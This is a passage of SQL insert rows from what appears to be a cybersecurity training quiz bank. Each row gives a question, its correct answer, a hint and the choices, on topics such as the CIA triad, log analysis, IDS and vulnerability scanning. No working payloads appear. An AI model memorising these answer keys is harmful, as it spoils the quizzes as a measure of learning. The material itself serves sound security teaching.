(5441, 44, 'What is Plaintext?', 3, 'Readable data', 0, 'Unencrypted', '2025-12-26 20:58:02', '[\"Ciphertext\", \"Hashed data\", \"Readable data\", \"Key\"]'),
(5442, 45, 'Is hashing reversible?', 1, 'No', 0, 'One-way function', '2025-12-26 20:58:02', '[\"Yes\", \"No\", \"Only with a key\", \"Only for admins\"]'),
(5443, 45, 'What is the primary goal of hashing?', 2, 'Integrity', 0, 'Fingerprinting', '2025-12-26 20:58:02', '[\"Confidentiality\", \"Availability\", \"Integrity\", \"Speed\"]'),
(5444, 45, 'Which hashing algorithm is considered secure today?', 3, 'SHA-256', 0, 'Standard', '2025-12-26 20:58:02', '[\"MD5\", \"SHA-1\", \"SHA-256\", \"ROT13\"]'),
(5445, 46, 'What is another name for Defense in Depth?', 1, 'Layered Security', 0, 'Onion', '2025-12-26 20:58:02', '[\"Single Point of Failure\", \"Layered Security\", \"Zero Trust\", \"Active Defense\"]'),
(5446, 46, 'Which layer involves educating users?', 2, 'Human', 0, 'Training', '2025-12-26 20:58:02', '[\"Physical\", \"Network\", \"Human\", \"Application\"]'),
(5447, 46, 'Why use multiple layers?', 3, 'Redundancy', 0, 'If one fails', '2025-12-26 20:58:02', '[\"Cost savings\", \"Redundancy\", \"Simplicity\", \"Speed\"]'),
(5448, 47, 'What fundamental triad models information security?', 1, 'CIA', 0, 'Confidentiality Integrity Availability', '2025-12-26 20:58:02', '[\"ABC\", \"CIA\", \"RGB\", \"SSH\"]'),
(5449, 47, 'Which element of CIA ensures systems are up and running?', 2, 'Availability', 0, 'Uptime', '2025-12-26 20:58:02', '[\"Confidentiality\", \"Integrity\", \"Availability\", \"Authentication\"]'),
(5450, 47, 'Fingerprints and Retina scans are examples of?', 3, 'Biometrics', 0, 'Something you are', '2025-12-26 20:58:02', '[\"Passwords\", \"Tokens\", \"Biometrics\", \"Smart Cards\"]'),
(5451, 47, 'Identifying a user is called?', 4, 'Authentication', 0, 'AuthN', '2025-12-26 20:58:02', '[\"Authorization\", \"Accounting\", \"Authentication\", \"Access\"]'),
(5452, 47, 'Determining what a user is allowed to do is?', 5, 'Authorization', 0, 'AuthZ', '2025-12-26 20:58:02', '[\"Authentication\", \"Accounting\", \"Authorization\", \"Auditing\"]'),
(5453, 47, 'Which access control model uses \"Top Secret\" labels?', 6, 'MAC', 0, 'Mandatory', '2025-12-26 20:58:02', '[\"DAC\", \"MAC\", \"RBAC\", \"Rule-Based\"]'),
(5454, 47, 'Which access control model relies on the data owner?', 7, 'DAC', 0, 'Discretionary', '2025-12-26 20:58:02', '[\"MAC\", \"DAC\", \"RBAC\", \"ABAC\"]'),
(5455, 47, 'Tracking user activities in logs is known as?', 8, 'Accounting', 0, 'The 3rd A', '2025-12-26 20:58:02', '[\"Authentication\", \"Authorization\", \"Accounting\", \"Analysis\"]'),
(5456, 47, 'Which type of encryption uses a Public and Private key?', 9, 'Asymmetric', 0, 'Two keys', '2025-12-26 20:58:03', '[\"Symmetric\", \"Asymmetric\", \"Hashing\", \"Linear\"]'),
(5457, 47, 'Which type of encryption uses a single shared key?', 10, 'Symmetric', 0, 'Faster', '2025-12-26 20:58:03', '[\"Asymmetric\", \"Symmetric\", \"Hashing\", \"Private\"]'),
(5458, 47, 'Which function is One-Way and non-reversible?', 11, 'Hashing', 0, 'Fingerprint', '2025-12-26 20:58:03', '[\"Encryption\", \"Encoding\", \"Hashing\", \"Compression\"]'),
(5459, 47, 'Which is a secure hashing algorithm?', 12, 'SHA-256', 0, 'Modern', '2025-12-26 20:58:03', '[\"MD5\", \"SHA-1\", \"SHA-256\", \"CRC32\"]'),
(5460, 47, 'What is the best defense against social engineering?', 13, 'User Training', 0, 'Human layer', '2025-12-26 20:58:03', '[\"Firewalls\", \"Encryption\", \"User Training\", \"Biometrics\"]'),
(5461, 47, 'Layering multiple security controls is called?', 14, 'Defense in Depth', 0, 'Onion', '2025-12-26 20:58:03', '[\"Offense in Depth\", \"Defense in Depth\", \"Single Defense\", \"Zero Security\"]'),
(5462, 47, 'What does Non-Repudiation provide?', 15, 'Proof of origin', 0, 'Cannot deny', '2025-12-26 20:58:03', '[\"Privacy\", \"Proof of origin\", \"Speed\", \"Availability\"]'),
(5463, 47, 'Which helps protect Data Integrity?', 16, 'Hashing', 0, 'Check change', '2025-12-26 20:58:03', '[\"Encryption\", \"Hashing\", \"Backups\", \"Firewalls\"]'),
(5464, 47, 'What does MFA stand for?', 17, 'Multi-Factor Authentication', 0, '2+ factors', '2025-12-26 20:58:03', '[\"Multi-Factor Authorization\", \"Multi-Function Access\", \"Multi-Factor Authentication\", \"Main Factor Auth\"]'),
(5465, 47, 'Is a password \"Something you have\"?', 18, 'No', 0, 'Something you know', '2025-12-26 20:58:03', '[\"Yes\", \"No\", \"Depends\", \"Sometimes\"]'),
(5466, 47, 'Which layer of Defense in Depth includes Firewalls?', 19, 'Network', 0, 'Perimeter', '2025-12-26 20:58:03', '[\"Physical\", \"Network\", \"Human\", \"Data\"]'),
(5467, 47, 'Which is NOT a pillar of the CIA triad?', 20, 'Authorization', 0, 'Not C-I-A', '2025-12-26 20:58:03', '[\"Confidentiality\", \"Integrity\", \"Availability\", \"Authorization\"]'),
(5483, 48, 'Which command lists files?', 1, 'dir', 0, 'Directory', '2025-12-26 21:05:12', '[\"ls\", \"list\", \"dir\", \"show\"]'),
(5484, 48, 'How do you enter the \"Documents\" folder?', 2, 'cd Documents', 0, 'Change Directory', '2025-12-26 21:05:12', '[\"dir Documents\", \"cd Documents\", \"enter Documents\", \"go Documents\"]'),
(5485, 48, 'What does \"cd ..\" do?', 3, 'Go back one level', 0, 'Parent directory', '2025-12-26 21:05:12', '[\"Deletes folder\", \"Go back one level\", \"Go to root\", \"Nothing\"]'),
(5486, 49, 'Which command reads a file content?', 1, 'type', 0, 'Type out', '2025-12-26 21:05:12', '[\"read\", \"cat\", \"type\", \"open\"]'),
(5487, 49, 'If you want to read \"note.txt\", what do you type?', 2, 'type note.txt', 0, 'Command + Arg', '2025-12-26 21:05:12', '[\"read note.txt\", \"type note.txt\", \"cat note.txt\", \"open note.txt\"]'),
(5488, 49, 'Is \"cat\" a standard Windows command?', 3, 'No', 0, 'type is used', '2025-12-26 21:05:12', '[\"Yes\", \"No\", \"Maybe\", \"Only in PowerShell\"]'),
(5489, 50, 'Which command shows the computer name?', 1, 'hostname', 0, 'Host', '2025-12-26 21:05:12', '[\"name\", \"hostname\", \"computername\", \"id\"]'),
(5490, 50, 'Which command shows the current user?', 2, 'whoami', 0, 'Identity', '2025-12-26 21:05:12', '[\"user\", \"me\", \"whoami\", \"id\"]'),
(5491, 50, 'Why is \"whoami\" important?', 3, 'To check permissions', 0, 'Privilege level', '2025-12-26 21:05:12', '[\"To check time\", \"To check IP\", \"To check permissions\", \"To list files\"]'),
(5492, 51, 'Which command shows IP details on Windows?', 1, 'ipconfig', 0, 'IP Config', '2025-12-26 21:05:12', '[\"ifconfig\", \"ipconfig\", \"ip a\", \"net config\"]'),
(5493, 51, 'What does Default Gateway usually represent?', 2, 'The Router', 0, 'Exit point', '2025-12-26 21:05:12', '[\"The PC\", \"The Router\", \"The Server\", \"The DNS\"]'),
(5494, 51, 'What is a common local IP starting with?', 3, '192.168', 0, 'Private range', '2025-12-26 21:05:12', '[\"8.8.8\", \"192.168\", \"1.1.1\", \"255.255\"]'),
(5495, 52, 'Which command lists running processes?', 1, 'tasklist', 0, 'List tasks', '2025-12-26 21:05:12', '[\"ps\", \"tasklist\", \"proclist\", \"top\"]'),
(5496, 52, 'What does PID stand for?', 2, 'Process ID', 0, 'Identifier', '2025-12-26 21:05:12', '[\"Program ID\", \"Process ID\", \"Personal ID\", \"Path ID\"]'),
(5497, 52, 'Which switch is used to kill by PID?', 3, '/PID', 0, 'Switch', '2025-12-26 21:05:12', '[\"-p\", \"/PID\", \"-id\", \"--pid\"]'),
(5522, 54, 'What is the severity level of the Challenge Log?', 1, 'ERROR', 0, 'Keyword after timestamp', '2025-12-26 21:12:59', '[\"INFO\", \"DEBUG\", \"ERROR\", \"FATAL\"]'),
(5523, 54, 'Which user was involved in the event?', 2, 'db_admin', 0, 'User field', '2025-12-26 21:12:59', '[\"alice\", \"admin\", \"db_admin\", \"root\"]'),
(5524, 54, 'What database was being accessed?', 3, 'users_db', 0, 'Accessing...', '2025-12-26 21:12:59', '[\"auth_db\", \"users_db\", \"main_db\", \"logs\"]'),
(5525, 55, 'How many failed attempts are shown?', 1, '2', 0, 'Count \"Failed\"', '2025-12-26 21:12:59', '[\"1\", \"2\", \"3\", \"0\"]'),
(5526, 55, 'Which user successfully logged in?', 2, 'root', 0, 'Look for \"Accepted\"', '2025-12-26 21:12:59', '[\"guest\", \"admin\", \"root\", \"user\"]'),
(5527, 55, 'What port is the SSH server running on?', 3, '2222', 0, 'port ...', '2025-12-26 21:12:59', '[\"22\", \"80\", \"2222\", \"443\"]'),
(5528, 56, 'What HTTP method was used in the challenge?', 1, 'POST', 0, 'First word inside quotes', '2025-12-26 21:12:59', '[\"GET\", \"POST\", \"PUT\", \"HEAD\"]'),
(5529, 56, 'What status code was returned?', 2, '401', 0, 'Number after HTTP version', '2025-12-26 21:12:59', '[\"200\", \"404\", \"401\", \"500\"]'),
(5530, 56, 'What page was requested?', 3, '/admin/login.php', 0, 'Path', '2025-12-26 21:12:59', '[\"/index.html\", \"/admin/login.php\", \"/login\", \"/home\"]'),
(5531, 57, 'What is the specific failure reason?', 1, 'Account locked out', 0, 'Read Failure Reason', '2025-12-26 21:12:59', '[\"Bad password\", \"Account locked out\", \"Unknown user\", \"Wrong domain\"]'),
(5532, 57, 'What is the Event ID?', 2, '4625', 0, 'Top line', '2025-12-26 21:12:59', '[\"4624\", \"4625\", \"4672\", \"1000\"]'),
(5533, 57, 'Which IP address initiated the request?', 3, '10.0.0.88', 0, 'Source Network Address', '2025-12-26 21:12:59', '[\"127.0.0.1\", \"10.0.0.88\", \"192.168.1.1\", \"0.0.0.0\"]'),
(5534, 58, 'What SQL command is visible in the URL?', 1, 'UNION SELECT', 0, 'Keyword', '2025-12-26 21:12:59', '[\"DROP TABLE\", \"UNION SELECT\", \"UPDATE\", \"INSERT\"]'),
(5535, 58, 'What does %27 represent in URL encoding?', 2, 'Single Quote (\')', 0, 'Hex for quote', '2025-12-26 21:12:59', '[\"Space\", \"Single Quote (\')\", \"Double Quote (\\\")\", \"Percent Sign\"]'),
(5536, 58, 'Did the server block this request?', 3, 'No (Status 200)', 0, 'Status code', '2025-12-26 21:12:59', '[\"Yes (403)\", \"No (Status 200)\", \"Yes (500)\", \"Maybe\"]'),
(5537, 59, 'What describes the destination port 3389?', 1, 'RDP (Remote Desktop)', 0, 'Common Port', '2025-12-26 21:12:59', '[\"SSH\", \"HTTP\", \"RDP (Remote Desktop)\", \"FTP\"]'),
(5538, 59, 'What flag indicates a connection attempt?', 2, 'SYN', 0, 'TCP Flag', '2025-12-26 21:12:59', '[\"ACK\", \"SYN\", \"FIN\", \"RST\"]'),
(5539, 59, 'Was the connection allowed?', 3, 'No (DROP)', 0, 'Action', '2025-12-26 21:12:59', '[\"Yes (ACCEPT)\", \"No (DROP)\", \"Logged only\", \"Unknown\"]'),
(5540, 60, 'What malicious command is being downloaded?', 1, 'malware.sh', 0, 'File name', '2025-12-26 21:12:59', '[\"virus.exe\", \"malware.sh\", \"test.txt\", \"config.php\"]'),
(5541, 60, 'What tool is used to download the file?', 2, 'wget', 0, 'Command', '2025-12-26 21:12:59', '[\"curl\", \"wget\", \"cat\", \"ping\"]'),
(5542, 60, 'What character is encoded as %7C?', 3, 'Pipe (|)', 0, 'Separator', '2025-12-26 21:12:59', '[\"Semicolon (;)\", \"Pipe (|)\", \"Ampersand (&)\", \"Space\"]'),
(5543, 61, 'What does the decoded command try to do?', 1, 'Download a script', 0, 'DownloadString', '2025-12-26 21:12:59', '[\"Delete files\", \"Download a script\", \"Encrypt drive\", \"Add user\"]'),
(5544, 61, 'What command is executed after downloading?', 2, 'IEX (Invoke-Expression)', 0, 'First word decoded', '2025-12-26 21:12:59', '[\"cmd.exe\", \"IEX (Invoke-Expression)\", \"Start-Process\", \"Write-Host\"]'),
(5545, 61, 'What parameter indicates the command is encoded?', 3, '-Enc', 0, 'Short for -EncodedCommand', '2025-12-26 21:12:59', '[\"-NoP\", \"-NonI\", \"-W\", \"-Enc\"]'),
(5546, 72, 'What describes a Forward Proxy?', 1, 'Acts for the client', 0, 'School/Work proxy', '2025-12-26 21:17:42', '[\"Acts for the server\", \"Acts for the client\", \"Is a VPN\", \"Is a firewall\"]'),
(5547, 72, 'What is the main role of an Intercepting Proxy?', 2, 'View/Modify traffic', 0, 'MitM', '2025-12-26 21:17:42', '[\"Speed up internet\", \"View/Modify traffic\", \"Encrypt data\", \"Host websites\"]'),
(5548, 72, 'What typically uses a Reverse Proxy?', 3, 'High traffic servers', 0, 'Load balancing', '2025-12-26 21:17:42', '[\"Home users\", \"High traffic servers\", \"Laptops\", \"Printers\"]'),
(5549, 73, 'What is Burp Suite primarily used for?', 1, 'Web Security Testing', 0, 'Hacking apps', '2025-12-26 21:17:42', '[\"Network Scanning\", \"Web Security Testing\", \"Password Management\", \"Virus Scanning\"]'),
(5550, 73, 'Which component allows modifying and re-sending individual requests?', 2, 'Repeater', 0, 'Repeat', '2025-12-26 21:17:42', '[\"Proxy\", \"Scanner\", \"Repeater\", \"Intruder\"]'),
(5551, 73, 'Which component is used for automated attacks?', 3, 'Intruder', 0, 'Brute force', '2025-12-26 21:17:42', '[\"Repeater\", \"Intruder\", \"Decoder\", \"Comparer\"]'),
(5552, 74, 'What happens when \"Intercept is On\"?', 1, 'Requests hang/pause', 0, 'Waiting for you', '2025-12-26 21:17:42', '[\"Requests go faster\", \"Requests hang/pause\", \"Browser closes\", \"Server errors\"]'),
(5553, 74, 'Why would you modify the User-Agent header?', 2, 'Pretend to be a specific device', 0, 'Mobile testing', '2025-12-26 21:17:42', '[\"To hack wifi\", \"Pretend to be a specific device\", \"To clear cache\", \"To speed up login\"]'),
(5554, 74, 'What allows you to send the paused request to the server?', 3, 'Forward button', 0, 'Action', '2025-12-26 21:17:42', '[\"Drop button\", \"Forward button\", \"Stop button\", \"Delete button\"]'),
(5555, 75, 'Why use Repeater instead of the browser?', 1, 'Faster iteration', 0, 'Testing variations', '2025-12-26 21:17:42', '[\"Better graphics\", \"Faster iteration\", \"Browser is blocked\", \"It is automatic\"]'),
(5556, 75, 'What does %20 represent in URL encoding?', 2, 'Space', 0, 'Whitespace', '2025-12-26 21:17:42', '[\"Tab\", \"Enter\", \"Space\", \"Slash\"]'),
(5557, 75, 'What tool converts Base64 back to text?', 3, 'Decoder', 0, 'Decode', '2025-12-26 21:17:42', '[\"Encoder\", \"Decoder\", \"Translator\", \"Compiler\"]'),
(5558, 76, 'What happens in a proxy chain?', 1, 'Traffic hops through multiple nodes', 0, 'A->B->C', '2025-12-26 21:17:42', '[\"Traffic is blocked\", \"Traffic hops through multiple nodes\", \"Traffic is deleted\", \"Traffic is faster\"]'),
(5559, 76, 'What is the main difference between Proxy and VPN?', 2, 'VPN encrypts entire device traffic', 0, 'Scope', '2025-12-26 21:17:42', '[\"Proxy is faster\", \"VPN is free\", \"VPN encrypts entire device traffic\", \"Proxy is hardware\"]'),
(5560, 76, 'If you chain A->B->C, who does the Target see?', 3, 'Proxy C', 0, 'The last one', '2025-12-26 21:17:42', '[\"You\", \"Proxy A\", \"Proxy B\", \"Proxy C\"]'),
(5693, 77, 'Which system is typically deployed \"Inline\"?', 1, 'IPS', 0, 'Intrusion Prevention', '2025-12-26 22:11:01', '[\"IDS\", \"IPS\", \"SIEM\", \"TAP\"]'),
(5694, 77, 'What happens if an Out-of-Band IDS crashes?', 2, 'Traffic continues (Fail Open)', 0, 'Loss of visibility only', '2025-12-26 22:11:01', '[\"Network outage\", \"Traffic continues (Fail Open)\", \"Firewall locks down\", \"Servers reboot\"]'),
(5695, 77, 'Why is IPS riskier than IDS?', 3, 'Can block legitimate traffic', 0, 'Business interruption', '2025-12-26 22:11:01', '[\"It is more expensive\", \"It is slower\", \"Can block legitimate traffic\", \"It uses more power\"]'),
(5696, 78, 'Which detection method is best for known threats?', 1, 'Signature-Based', 0, 'Fast and accurate', '2025-12-26 22:11:01', '[\"Anomaly-Based\", \"Signature-Based\", \"Heuristic\", \"AI\"]'),
(5697, 78, 'What is the main advantage of Anomaly detection?', 2, 'Detecting Zero-Days', 0, 'Unknown threats', '2025-12-26 22:11:01', '[\"Speed\", \"Low cost\", \"Detecting Zero-Days\", \"Low false positives\"]'),
(5698, 78, 'What triggers an anomaly alert?', 3, 'Deviation from baseline', 0, 'Unusual behavior', '2025-12-26 22:11:01', '[\"A signature match\", \"A blacklisted IP\", \"Deviation from baseline\", \"A specific file hash\"]'),
(5699, 79, 'What is the major blind spot of NIDS today?', 1, 'Encrypted Traffic (HTTPS)', 0, 'Encryption', '2025-12-26 22:11:01', '[\"Speed\", \"Encrypted Traffic (HTTPS)\", \"UDP Packets\", \"IPv6\"]'),
(5700, 79, 'Where does HIDS sit in the encryption chain?', 2, 'After decryption', 0, 'On the host', '2025-12-26 22:11:01', '[\"Before encryption\", \"After decryption\", \"In the router\", \"On the switch\"]'),
(5701, 79, 'Which capability is unique to HIDS?', 3, 'File Integrity Monitoring', 0, 'FIM', '2025-12-26 22:11:01', '[\"Packet Capture\", \"Flow Analysis\", \"File Integrity Monitoring\", \"DDoS Protection\"]'),
(5702, 81, 'How does Zeek primarily store data?', 1, 'Transaction Logs', 0, 'Metadata', '2025-12-26 22:11:01', '[\"Full Packet Capture\", \"Transaction Logs\", \"SQL Database\", \"Binary Blobs\"]'),
(5703, 81, 'Which log file contains the volume of data transferred?', 2, 'conn.log', 0, 'Connection', '2025-12-26 22:11:01', '[\"files.log\", \"conn.log\", \"http.log\", \"stats.log\"]'),
(5704, 81, 'Can Zeek detect anomalies in encrypted traffic?', 3, 'Yes (via metadata)', 0, 'Byte counts', '2025-12-26 22:11:01', '[\"No\", \"Yes (via metadata)\", \"Only if decrypted\", \"Never\"]'),
(5705, 82, 'What is the best way to tell if an attack succeeded?', 1, 'Check the Server Response', 0, 'Response Code', '2025-12-26 22:11:01', '[\"Check the Source IP\", \"Check the Server Response\", \"Check the Timestamp\", \"Check the Rule ID\"]'),
(5706, 82, 'If a payload appears in an email body triggering an alert, it is likely a?', 2, 'False Positive', 0, 'Context mismatch', '2025-12-26 22:11:01', '[\"True Positive\", \"False Positive\", \"Zero Day\", \"Insider Threat\"]'),
(5707, 82, 'A \"404 Not Found\" response generally indicates?', 3, 'Attempt Failed', 0, 'Target does not exist', '2025-12-26 22:11:01', '[\"Successful Hack\", \"Attempt Failed\", \"Server Offline\", \"IDS Failure\"]'),
(5708, 83, 'What is the standard solution for internal scanners triggering alerts?', 1, 'Whitelisting', 0, 'Ignoring IP', '2025-12-26 22:11:01', '[\"Blocking them\", \"Whitelisting\", \"Counter-attacking\", \"Disabling the IDS\"]'),
(5709, 83, 'What technique limits alerts to \"X times per minute\"?', 2, 'Thresholding', 0, 'Suppression', '2025-12-26 22:11:01', '[\"Whitelisting\", \"Thresholding\", \"Dropping\", \"Sampling\"]'),
(5710, 83, 'Why might P2P updates trigger alerts?', 3, 'Look like Botnet traffic', 0, 'Behavior', '2025-12-26 22:11:01', '[\"They are viruses\", \"Look like Botnet traffic\", \"They are unencrypted\", \"They are slow\"]'),
(5711, 84, 'What is the first step before you can scan?', 1, 'Discovery / Asset Management', 0, 'Knowing what to scan', '2025-12-26 22:11:01', '[\"Remediation\", \"Prioritization\", \"Discovery / Asset Management\", \"Reporting\"]'),
(5712, 84, 'Why is \"Verification\" necessary after patching?', 2, 'To ensure patch was applied correctly', 0, 'Trust but verify', '2025-12-26 22:11:01', '[\"It isn\'t\", \"To ensure patch was applied correctly\", \"To double billing\", \"To slow down IT\"]'),
(5713, 84, 'What is \"Shadow IT\"?', 3, 'Unknown/Unmanaged assets', 0, 'Hidden servers', '2025-12-26 22:11:01', '[\"Hacker tools\", \"Unknown/Unmanaged assets\", \"Dark mode\", \"VPNs\"]'),
(5714, 85, 'Which scan type is less accurate finding missing patches?', 1, 'Unauthenticated', 0, 'External', '2025-12-26 22:11:01', '[\"Authenticated\", \"Unauthenticated\", \"Agent-based\", \"Internal\"]'),
(5715, 85, 'How does an authenticated scan check for patches?', 2, 'Logs in and checks files/registry', 0, 'Commands', '2025-12-26 22:11:01', '[\"Guesses\", \"Checks headers\", \"Logs in and checks files/registry\", \"Port scan\"]'),
(5716, 85, 'What is a common issue with \"Banner Grabbing\"?', 3, 'Banners can act or lie', 0, 'Inaccurate', '2025-12-26 22:11:01', '[\"It causes crashes\", \"Banners can act or lie\", \"It requires passwords\", \"It is too slow\"]'),
(5717, 86, 'What does \"AV:N\" stand for?', 1, 'Attack Vector: Network', 0, 'Remote', '2025-12-26 22:11:01', '[\"Attack Vector: None\", \"Attack Vector: Network\", \"Anti-Virus: None\", \"Admin View: No\"]'),
(5718, 86, 'Which metric indicates user interaction is NOT needed?', 2, 'UI:N', 0, 'Automatic', '2025-12-26 22:11:01', '[\"UI:R\", \"UI:N\", \"PR:N\", \"AV:L\"]'),
(5719, 86, 'A \"Scope Change\" (S:C) usually implies what?', 3, 'Breaking out of sandbox/VM', 0, 'Higher impact', '2025-12-26 22:11:01', '[\"Local only\", \"Breaking out of sandbox/VM\", \"Lower score\", \"Network only\"]'),
(5720, 87, 'Why should you place local scanners in each network segment?', 1, 'To avoid scanning through firewalls', 0, 'Efficiency', '2025-12-26 22:11:01', '[\"To waste money\", \"To avoid scanning through firewalls\", \"Because Nessus requires it\", \"To use more IPs\"]'),
(5721, 87, 'Which scan policy is best for solely finding live hosts?', 2, 'Host Discovery', 0, 'Ping sweep', '2025-12-26 22:11:01', '[\"Basic Network Scan\", \"Web App Scan\", \"Host Discovery\", \"Malware Scan\"]'),
(5722, 87, 'Why avoid scanning SCADA/Printers with aggressive policies?', 3, 'They are fragile and can crash', 0, 'Stability', '2025-12-26 22:11:01', '[\"They have no vulns\", \"They are fragile and can crash\", \"They are strictly read-only\", \"Nessus cannot scan them\"]'),
(5723, 88, 'If \"Exploit Available\" is Yes, what does that mean?', 1, 'Hackable tools exist publicly', 0, 'Urgent', '2025-12-26 22:11:01', '[\"It is theoretical\", \"Hackable tools exist publicly\", \"It is a zero-day\", \"It involves money\"]'),
(5724, 88, 'What does VPR add to the standard CVSS score?', 2, 'Real-world threat context', 0, 'Intel', '2025-12-26 22:11:01', '[\"Nothing\", \"Real-world threat context\", \"User opinion\", \"Randomness\"]'),
(5725, 88, 'What is the first filter you should typically apply?', 3, 'Severity (Crit/High)', 0, 'Triage', '2025-12-26 22:11:01', '[\"Low/Info\", \"Severity (Crit/High)\", \"Port 80\", \"Name\"]'),
(5726, 89, 'What is a \"Pilot\" group in patching?', 1, 'A small test subset of production', 0, 'Canary', '2025-12-26 22:11:01', '[\"The IT team\", \"A small test subset of production\", \"The CEO\", \"The printers\"]'),
(5727, 89, 'Why might you skip testing for an \"Emergency\" patch?', 2, 'Immediate exploitation risk', 0, 'Zero Day', '2025-12-26 22:11:01', '[\"Too lazy\", \"Immediate exploitation risk\", \"Patches never fail\", \"Vendor guarantee\"]'),
(5728, 89, 'What allows you to recover if a patch kills a server?', 3, 'Snapshots / Rollback Plan', 0, 'Backup', '2025-12-26 22:11:01', '[\"Reinstalling OS\", \"Snapshots / Rollback Plan\", \"SLA\", \"Vulnerability Scan\"]'),
(5729, 90, 'Who maintains the CVE list?', 1, 'MITRE', 0, 'Organization', '2025-12-26 22:11:01', '[\"Microsoft\", \"MITRE\", \"Google\", \"NSA\"]'),
(5730, 90, 'What is the difference between CVE and CWE?', 2, 'CVE is specific instance, CWE is category', 0, 'Instance vs Class', '2025-12-26 22:11:01', '[\"They are the same\", \"CVE is for Windows, CWE for Linux\", \"CVE is specific instance, CWE is category\", \"CWE is a score\"]'),
(5731, 90, 'What database adds scoring (CVSS) to the CVEs?', 3, 'NVD', 0, 'National Vuln DB', '2025-12-26 22:11:01', '[\"MITRE\", \"OWASP\", \"NVD\", \"CISA\"]'),
(5732, 91, 'Which strategy involves shutting down a risky system?', 1, 'Avoidance', 0, 'Stop activity', '2025-12-26 22:11:01', '[\"Acceptance\", \"Transference\", \"Avoidance\", \"Mitigation\"]'),
(5733, 91, 'Buying insurance is an example of?', 2, 'Transference', 0, 'Moving risk', '2025-12-26 22:11:01', '[\"Acceptance\", \"Avoidance\", \"Transference\", \"Patching\"]'),
(5734, 91, 'If you Accept a risk, what is usually required?', 3, 'Compensating Controls / Sign-off', 0, 'Paperwork', '2025-12-26 22:11:01', '[\"Nothing\", \"Compensating Controls / Sign-off\", \"Patching\", \"Ignoring it\"]'),
(5735, 92, 'Does DAST require source code access?', 1, 'No (Black Box)', 0, 'Dynamic', '2025-12-26 22:11:01', '[\"Yes\", \"No (Black Box)\", \"Sometimes\", \"Only for Javascript\"]'),
(5736, 92, 'Which testing method happens \"running\" against a live app?', 2, 'DAST', 0, 'Dynamic', '2025-12-26 22:11:01', '[\"SAST\", \"DAST\", \"Unit Testing\", \"Linting\"]'),
(5737, 92, 'Why is DAST considered \"Technology Agnostic\"?', 3, 'HTTP is universal', 0, 'Attacks inputs', '2025-12-26 22:11:01', '[\"It knows all languages\", \"HTTP is universal\", \"It compiles code\", \"It uses AI\"]'),
(5738, 93, 'Which vulnerability category covers IDOR (Insecure Direct Object Reference)?', 1, 'Broken Access Control', 0, 'Permissions', '2025-12-26 22:11:01', '[\"Injection\", \"Broken Access Control\", \"Cryptographic Failures\", \"Logging Failures\"]'),
(5739, 93, 'What is the best defense against Injection?', 2, 'Parameterized Queries', 0, 'Prepared Statements', '2025-12-26 22:11:01', '[\"Firewalls\", \"Parameterized Queries\", \"Encryption\", \"Antivirus\"]'),
(5740, 93, 'Storing passwords in plain text falls under which category?', 3, 'Cryptographic Failures', 0, 'Crypto', '2025-12-26 22:11:01', '[\"Injection\", \"Cryptographic Failures\", \"Access Control\", \"Design Flaws\"]'),
(5741, 94, 'What feature prevents ZAP from attacking the entire internet?', 1, 'Scope / Contexts', 0, 'Limits', '2025-12-26 22:11:01', '[\"Firewall\", \"Scope / Contexts\", \"VPN\", \"Cables\"]'),
(5742, 94, 'What is the ZAP HUD?', 2, 'Browser overlay for testing', 0, 'UI', '2025-12-26 22:11:01', '[\"A report format\", \"Browser overlay for testing\", \"A CI pipeline\", \"A virus\"]'),
(5743, 94, 'Can ZAP be integrated into CI/CD pipelines?', 3, 'Yes (Headless/Docker)', 0, 'Automation', '2025-12-26 22:11:01', '[\"No, GUI only\", \"Yes (Headless/Docker)\", \"Only on Windows\", \"Cost extra\"]'),
(5744, 95, 'Why do traditional spiders fail on React apps?', 1, 'Content loads via JS/DOM', 0, 'SPA', '2025-12-26 22:11:01', '[\"React is secure\", \"Content loads via JS/DOM\", \"URLs are encrypted\", \"Firewalls block them\"]'),
(5745, 95, 'What does an AJAX spider use to crawl?', 2, 'A headless browser', 0, 'Rendering', '2025-12-26 22:11:01', '[\"Curl\", \"Wget\", \"A headless browser\", \"Guessing\"]'),
(5746, 95, 'How might an attacker use robots.txt?', 3, 'To find hidden/disallowed paths', 0, 'Recon', '2025-12-26 22:11:01', '[\"To obey rules\", \"To find hidden/disallowed paths\", \"To crash server\", \"To find emails\"]'),
(5747, 96, 'Why is Active Scanning risky in Production?', 1, 'Can delete data or cause DoS', 0, 'Destructive', '2025-12-26 22:11:01', '[\"It is slow\", \"Can delete data or cause DoS\", \"It costs money\", \"It is illegal in Prod\"]'),
(5748, 96, 'How does a Time-Based SQLi test verify the vuln?', 2, 'Measures server delay', 0, 'Timing', '2025-12-26 22:11:01', '[\"Checks error text\", \"Measures server delay\", \"Crashing server\", \"Downloading DB\"]'),
(5749, 96, 'If a scanner hits a \"Contact Us\" form, what happens?', 3, 'Floods inbox with junk', 0, 'Spam', '2025-12-26 22:11:01', '[\"Nothing\", \"Floods inbox with junk\", \"Hacks email\", \"Server reboots\"]'),
(5750, 97, 'If a payload appears in the response, is it always XSS?', 1, 'No, headers/encoding matter', 0, 'False Positive', '2025-12-26 22:11:01', '[\"Yes\", \"No, headers/encoding matter\", \"Only in Chrome\", \"Never\"]'),
(5751, 97, 'Why do Custom 404 pages confuse scanners?', 2, 'They return 200 OK status', 0, 'Status Code', '2025-12-26 22:11:01', '[\"They are hidden\", \"They return 200 OK status\", \"They are slow\", \"They are encrypted\"]'),
(5752, 97, 'What defines a professional analyst reporting DAST results?', 3, 'Manual Verification', 0, 'Curating', '2025-12-26 22:11:01', '[\"Copy-Pasting\", \"Manual Verification\", \"Ignoring Lows\", \"Running in background\"]'),
(5753, 98, 'What is better than reporting 100 individual bugs?', 1, 'Reporting the systemic root cause', 0, 'Grouping', '2025-12-26 22:11:01', '[\"Reporting 1000 bugs\", \"Reporting the systemic root cause\", \"Ignoring them\", \"Quitting\"]'),
(5754, 98, 'What helps a developer understand \"Why\" they should fix it?', 2, 'Risk Explanation', 0, 'Impact', '2025-12-26 22:11:01', '[\"CVSS Score\", \"Risk Explanation\", \"Manager threats\", \"Compliance laws\"]'),
(5755, 98, 'What is a \"PoC\" in reporting?', 3, 'Proof of Concept (Reproduction steps)', 0, 'Evidence', '2025-12-26 22:11:01', '[\"Point of Contact\", \"Proof of Concept (Reproduction steps)\", \"Piece of Code\", \"Priority of Criticality\"]'),
(5756, 160, 'What is the verified first step in the Vulnerability Management Lifecycle?', 1, 'Asset Discovery', 0, 'Finding the machines', '2025-12-26 22:11:01', '[\"Remediation\", \"Asset Discovery\", \"Scanning\", \"Reporting\"]'),
